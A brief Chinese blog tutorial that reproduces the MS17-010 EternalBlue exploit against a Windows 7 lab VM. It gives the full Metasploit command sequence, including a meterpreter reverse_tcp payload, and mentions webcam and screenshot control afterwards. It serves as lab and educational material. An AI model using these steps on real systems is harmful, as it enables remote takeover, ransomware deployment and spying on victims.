MS17-010漏洞利用复现
漏洞描述
Eternalblue永恒之蓝漏洞通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,使用恶意代码会扫描开放445文件共享端口的Windows机器,因为该漏洞无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
复现环境
攻击机:Kali-Linux-2018 IP:172.17.129.54
靶机:win7 x64 IP:172.17.129.58
漏洞利用
首先攻击机和靶机需要网络相同
随后我们开启数据库,这样我们在搜索攻击模块时会很快,而且你此次的渗透数据还可以保存到数据库中。
数据库和metasploit开启命令如下
service postgresql start //开启数据库
msfconsole
使用搜索命令,搜索ms17_010
search ms17_010
使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
查看所需要的配置
show options
然后开始配置payload、渗透(靶机)地址、监听地址(攻击)
set payload windows/x64/meterpreter/reverse_tcp
set rhost x.x.x.x //设置目标主机IP
set lhost x.x.x.x //设置本机主机IP
开始攻击输入exploit
exploit
此时我们已经通过勒索漏洞控制了该电脑,拿下了dos命令,同时meterpreter中有很多命令可用,如打开摄像头,截图等命令可用,如下图的演示截图客户机
本次演示到此结束,请及时关注我们
企鹅号:Tsg技术分享
领取专属 10元无门槛券
私享最新 技术干货